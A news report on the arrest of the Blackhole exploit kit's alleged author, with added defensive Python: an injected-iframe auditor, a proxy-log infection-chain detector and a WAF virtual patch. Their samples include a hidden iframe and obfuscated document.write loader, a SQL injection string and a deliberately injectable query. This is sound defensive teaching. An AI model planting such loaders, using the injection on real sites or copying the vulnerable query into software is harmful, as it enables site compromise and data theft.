Blackhole Author Arrested: 10 Facts About The Automated Attack Toolkit

Blackhole Exploit Kit Author Arrested

The alleged cybercriminal responsible for developing and maintaining the Blackhole automated attack toolkit was arrested this week, according to the European Cybercrime Centre (EC3). The agency confirmed to TechWeek Europe that authorities had a suspect in custody Tuesday. Blackhole, the most widely used exploit kit, was behind many of the financially motivated attacks aimed at businesses and consumers. It was sold on underground hacking forums under a subscription model that included periodic updates, and those updates carried some of the latest exploits, including ones for known Java vulnerabilities, Adobe coding errors and Microsoft flaws. The kit was often among the first to receive new exploits following major patch releases from software makers. Here are some facts about the most popular automated attack tool on the Internet.

Russian Cybercriminal Behind Attack Toolkit

Security researchers believe that a Russian software developer who goes by the handle "Paunch" is behind the Blackhole toolkit, which was first detected in 2011. There has been no official word from authorities identifying the person in custody. The kit was first released as a free download in 2011 and later rented for about $500 a month, or $50 a day. A recent review found it was still the most active toolkit, although competing kits have entered the market and some security vendors say Blackhole is in decline. Security firm AVG currently ranks Blackhole 24th among online malware threats worldwide, with detections on more than 36,000 websites in 218 countries.

Blackhole Targets Website Vulnerabilities

Toolkit operators build their attack platform on compromised websites. They break in through common Web application vulnerabilities, SQL injection and cross-site scripting chief among them, and plant malicious JavaScript that loads a hidden iframe within the page's HTML. The iframe pulls in the kit's landing page, which silently fingerprints each visitor's browser and plug-ins for versions with known, easily exploited flaws. When a vulnerable component is found, the matching exploit fires automatically and drops a malware loader onto the victim's machine.
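As an added illustration (not part of the original report, and not code from the kit or any vendor): a check a site owner can run against their own pages to spot the injection pattern just described, namely an iframe that is hidden or points off-site, or a script that writes such an iframe at runtime. The two sample pages, the site hostname and the addresses in them are constructed for the example.

```python
"""Content-integrity check for the exploit-kit injection pattern: a hidden or
off-site iframe, or a script that writes one at runtime.  Added example; the
two pages below are constructed and the site host is an assumed value."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class IframeAuditor(HTMLParser):
    """Collects (kind, evidence, reason) tuples for suspicious iframes and scripts."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host      # the host the page legitimately belongs to
        self.findings = []
        self._script = None             # buffer while inside <script>...</script>

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            self._check_iframe(a)
        elif tag == "script":
            self._script = []

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            self._check_script("".join(self._script))
            self._script = None

    def _offsite(self, src):
        host = urlparse(src).hostname
        return bool(host) and host != self.site_host

    @staticmethod
    def _hidden(a):
        style = (a.get("style") or "").replace(" ", "").lower()
        sizes = [a.get("width", ""), a.get("height", "")]
        return ("display:none" in style or "visibility:hidden" in style
                or re.search(r"(left|top):-\d{3,}", style) is not None   # pushed off-screen
                or any(s.isdigit() and int(s) <= 1 for s in sizes))       # 0x0 / 1x1 frame

    def _check_iframe(self, a):
        src = a.get("src", "")
        reasons = []
        if self._offsite(src):
            reasons.append("off-site src")
        if self._hidden(a):
            reasons.append("hidden or zero-size")
        if reasons:
            self.findings.append(("iframe", src, ", ".join(reasons)))

    def _check_script(self, body):
        # Injected loaders usually assemble the iframe at runtime so a grep for
        # "<iframe" misses it: document.write(unescape('%3Ciframe ...')) and similar.
        low = body.lower()
        obfuscated = any(t in low for t in ("unescape(", "fromcharcode(", "%3ciframe"))
        if "%3ciframe" in low or ("document.write" in low and ("iframe" in low or obfuscated)):
            self.findings.append(("script", body.strip()[:60], "iframe written at runtime"))


def audit_page(html, site_host):
    p = IframeAuditor(site_host)
    p.feed(html)
    p.close()
    return p.findings


# Constructed samples: a clean page and the same page with an injected loader.
CLEAN = """<html><body><h1>Welcome</h1>
<iframe src="/widgets/weather" width="300" height="150"></iframe>
<script>var a = 1;</script></body></html>"""

INFECTED = """<html><body><h1>Welcome</h1>
<iframe src="http://203.0.113.7/index.php" width="1" height="1" style="visibility:hidden"></iframe>
<script>document.write(unescape('%3Ciframe src=%22http://198.51.100.9/in.cgi%22 width=0 height=0%3E%3C/iframe%3E'));</script>
</body></html>"""

if __name__ == "__main__":
    for label, page in (("clean", CLEAN), ("infected", INFECTED)):
        print(label, audit_page(page, "www.example.com"))
```

Run it against a saved copy of each page on a schedule and diff the findings; a legitimate third-party widget will show up once as an off-site iframe and can be whitelisted, whereas a new hidden frame or a runtime-written one appearing between two scans is exactly the compromise the article describes.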

Blackhole Attacks Driven By Malicious Links

Victims generally reach the Blackhole toolkit through spam messages containing a malicious link or through poisoned advertisements that redirect the browser to the kit. Visiting compromised websites, often otherwise legitimate sites, can also lead to infection. The goal of the kit is reach: infecting as many victims as possible.

Blackhole Behind Spread Of Zeus, SpyEye Banking Trojans

Blackhole is partly responsible for the spread of Zeus and SpyEye, two closely related banking Trojan families that have stolen millions of bank account holders' credentials. The toolkit was used to build the attack websites. Victims receive spam email and are redirected to an attack site, where Blackhole targets Adobe Reader, Flash and Java browser plug-in vulnerabilities. Blackhole doesn't drop the Zeus payload directly; it installs a tiny loader that retrieves Zeus from an additional website, according to research by Dell SecureWorks.

Blackhole Uses Java, Flash, .PDF Exploits

One recent study estimated that unpatched Java installations accounted for 60 percent of successful Blackhole exploits. Researchers detected the toolkit targeting a Java zero-day vulnerability in January, but automated attack toolkits typically target older, already patched flaws. Blackhole is constantly changing, but security researchers say it carries exploits for at least three Java vulnerabilities at any given time.

The kit has been seen exploiting five or more Adobe PDF vulnerabilities and also serves up malicious Adobe Flash files. Thirty percent of the malware samples analyzed by managed security services provider Solutionary were traced back to Blackhole. Solutionary said exploit kits like Blackhole succeed because users persistently fail to patch their systems and browser components.

Blackhole Success Largely Due To Traffic Generation

Traffic redirected to the exploit kit is fundamental to its success, according to Blackhole research by Sophos researcher Fraser Howard. The kit also changes constantly, with strong evasion capabilities that help it slip past URL filters, intrusion detection systems and other security controls. Blackhole, according to Howard, has also been competitively priced and viewed favorably on hacking forums for its support and frequent updates. Howard predicted that the centralized approach used to maintain control over Blackhole could also prove its Achilles' heel, enabling law enforcement to shut it down or severely cripple it.

Blackhole Hosted Mostly In US, Russia

The United States and Russia host the most compromised websites serving Blackhole, according to data from U.K.-based security vendor Sophos. The firm said attackers often register a .com domain and turn it into an attack site within 24 hours. "Blackhole host sites move rapidly," the firm said. Attackers also compromise the Web servers behind legitimate sites, planting malicious code that launches a stealthy attack when victims visit an infected page.

Defending The Network From Blackhole: Exploit Kit Prevention

Security experts advocate a variety of technologies to protect against automated attack toolkits. Intrusion prevention systems detect and block attacks in progress. Threat intelligence feeds can be fed into network monitoring and blocking systems to apply protections against the latest threats and to block the IP addresses and domains associated with them. End users should run up-to-date endpoint security software. Web content filtering can block access to known attack sites and flag botnet activity by spotting malicious traffic. Since unpatched Java, Reader and Flash account for the bulk of successful Blackhole exploits, keeping browser plug-ins patched, or disabling the ones that aren't needed, removes most of the kit's attack surface.
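As an added example (not from the original report or any vendor product), here is how the infection chain the article lays out above, a redirect from a legitimate site to an attack site, a plug-in exploit file served from that site, then a tiny loader fetching an executable from yet another host, can be spotted in Web proxy logs. The log format, every sample line, the addresses and the 60-second window are constructed assumptions for the example.

```python
"""Spot the exploit-kit infection chain in Web proxy logs: a cross-site hop to a
landing page, an exploit file (.jar/.pdf/.swf) from that same host, then an
executable fetched by the dropped loader.  Added example: the log format and
all sample lines are constructed, and the 60-second window is an assumption."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlparse

LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+) (\d{3}) (\d+)$")
EXPLOIT_EXT = (".jar", ".pdf", ".swf")     # plug-in exploit carriers named in the article
PAYLOAD_EXT = (".exe", ".dll", ".scr")     # what the tiny loader pulls down next
WINDOW = timedelta(seconds=60)


def parse_line(line):
    """'<ISO time> <client> <method> <url> <referer|-> <status> <bytes>' -> dict or None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts, ip, _method, url, ref, _status, _size = m.groups()
    return {
        "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
        "ip": ip,
        "url": url,
        "host": urlparse(url).hostname,
        "path": urlparse(url).path.lower(),
        "ref_host": urlparse(ref).hostname if ref != "-" else None,
    }


def detect_chains(lines):
    by_client = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_client[rec["ip"]].append(rec)

    alerts = []
    for ip, reqs in by_client.items():
        reqs.sort(key=lambda r: r["ts"])
        for i, landing in enumerate(reqs):
            # Step 1: the browser was pulled from one site to another, as an
            # injected iframe, malvertising redirect or spam link would do.
            if not landing["ref_host"] or landing["ref_host"] == landing["host"]:
                continue
            later = [r for r in reqs[i + 1:] if r["ts"] - landing["ts"] <= WINDOW]
            # Step 2: the new host serves a plug-in exploit file.
            exploit = next((r for r in later if r["host"] == landing["host"]
                            and r["path"].endswith(EXPLOIT_EXT)), None)
            if exploit is None:
                continue
            # Step 3: an executable follows, typically from yet another host.
            payload = next((r for r in later if r["ts"] >= exploit["ts"]
                            and r["path"].endswith(PAYLOAD_EXT)), None)
            if payload is not None:
                alerts.append({"client": ip, "compromised_site": landing["ref_host"],
                               "landing": landing["host"], "exploit": exploit["url"],
                               "payload": payload["url"]})
    return alerts


# Constructed sample: one infected client, one reading a PDF on the same site,
# one following a cross-site ad that never leads to an executable.
SAMPLE_LOG = """\
2013-10-08T14:02:10Z 10.0.0.5 GET http://www.news-site.example/story.html - 200 18233
2013-10-08T14:02:11Z 10.0.0.5 GET http://203.0.113.7/index.php http://www.news-site.example/story.html 200 5120
2013-10-08T14:02:13Z 10.0.0.5 GET http://203.0.113.7/files/exp.jar http://203.0.113.7/index.php 200 22000
2013-10-08T14:02:19Z 10.0.0.5 GET http://198.51.100.9/load.exe - 200 91000
2013-10-08T14:03:01Z 10.0.0.6 GET http://www.news-site.example/story.html - 200 18233
2013-10-08T14:03:05Z 10.0.0.6 GET http://www.news-site.example/report.pdf http://www.news-site.example/story.html 200 300411
2013-10-08T14:04:00Z 10.0.0.7 GET http://www.news-site.example/story.html - 200 18233
2013-10-08T14:04:01Z 10.0.0.7 GET http://ads.example/serve.php http://www.news-site.example/story.html 200 2100
2013-10-08T14:04:02Z 10.0.0.7 GET http://ads.example/banner.swf http://ads.example/serve.php 200 40000
"""

if __name__ == "__main__":
    for alert in detect_chains(SAMPLE_LOG.splitlines()):
        print(alert)
```

The two benign clients show why the chain matters more than any single request: a PDF from the site the user is already on, or a Flash banner reached through an ad network, are everyday traffic, and only the sequence ending in an executable download distinguishes the exploit kit. Because kit host sites move rapidly, correlating on behaviour like this holds up better than a static list of bad addresses, which is why it complements rather than replaces the threat intelligence feeds mentioned above.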

Defending A Website From Blackhole: Regular Scanning Works

Websites should be scanned regularly for Web application vulnerabilities and other weaknesses that an automated attack toolkit can detect and exploit, and their pages checked for injected code. A Web application firewall can shield Web applications from attack, and it can be used to apply a virtual patch that blocks exploit attempts against a known vulnerability until the official patch is applied. A virtual patch is a stopgap: it narrows what reaches the vulnerable code but does not remove the flaw, so the real fix should still follow.
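To make the virtual-patch idea concrete, here is an added example (not code from the report, any WAF vendor or any real site) that expresses such a rule as a WSGI middleware in front of a deliberately SQL-injectable page. The application, its table and the rule for the `id` parameter are all constructed for the illustration.

```python
"""Virtual patch for a SQL-injectable parameter, done as a WSGI middleware the
way a WAF rule would do it at the edge.  Added example: the vulnerable app,
its table and the 'id' rule are all constructed for illustration."""
import re
import sqlite3
from urllib.parse import parse_qs


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE articles(id INTEGER PRIMARY KEY, title TEXT, published INTEGER);
        INSERT INTO articles VALUES (1, 'Public story', 1), (2, 'Unpublished draft', 0);
    """)
    return conn


DB = build_db()


def vulnerable_app(environ, start_response):
    """The 'before' state: SQL built by string formatting from the 'id' parameter.
    The real fix is a parameterised query; the virtual patch below only shields it."""
    qs = parse_qs(environ.get("QUERY_STRING", ""))
    art_id = qs.get("id", ["0"])[0]
    sql = "SELECT title FROM articles WHERE id = %s AND published = 1" % art_id
    rows = DB.execute(sql).fetchall()
    start_response("200 OK", [("Content-Type", "text/plain")])
    return ["\n".join(r[0] for r in rows).encode()]


# Positive validation: what each guarded parameter is supposed to look like.
# A whitelist like this is far harder to evade than a blacklist of SQL keywords.
RULES = {"id": re.compile(r"[0-9]{1,9}")}


def virtual_patch(app, rules=RULES):
    """Wrap `app`; reject any request whose guarded parameter breaks its rule."""
    def guarded(environ, start_response):
        qs = parse_qs(environ.get("QUERY_STRING", ""), keep_blank_values=True)
        for name, pattern in rules.items():
            for value in qs.get(name, []):
                if not pattern.fullmatch(value):
                    start_response("403 Forbidden", [("Content-Type", "text/plain")])
                    return [b"blocked by virtual patch"]
        return app(environ, start_response)
    return guarded


def request(app, query_string):
    """Minimal WSGI client: returns (status, body) for a GET with `query_string`."""
    status = {}

    def start_response(code, headers):
        status["code"] = code

    body = b"".join(app({"REQUEST_METHOD": "GET", "QUERY_STRING": query_string}, start_response))
    return status["code"], body.decode()


PATCHED = virtual_patch(vulnerable_app)

if __name__ == "__main__":
    attack = "id=2%20OR%201%3D1"        # decodes to "2 OR 1=1" and leaks the unpublished row
    print(request(vulnerable_app, "id=1"))
    print(request(vulnerable_app, attack))
    print(request(PATCHED, "id=1"))
    print(request(PATCHED, attack))
```

Unpatched, the injected `OR 1=1` returns the unpublished draft alongside the public story; behind the middleware the same request is refused before it reaches the query. The rule describes the legitimate shape of the parameter rather than enumerating attack strings, which is what lets it hold against the obfuscated, constantly changing payloads the article attributes to Blackhole.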

Blackhole Author Created Premium 'Cool' Exploit Kit

The author of Blackhole is also said to be behind the Cool Exploit Kit, a premium attack toolkit that was reportedly rented for $10,000 a month. When it was released in January, the kit was advertised as carrying highly sought-after exploits for zero-day vulnerabilities. A review of the Cool kit conducted by Microsoft in May found it contained six exploits, including one Java flaw that was a zero-day at the time. Cool is also believed to have fueled an increase in ransomware.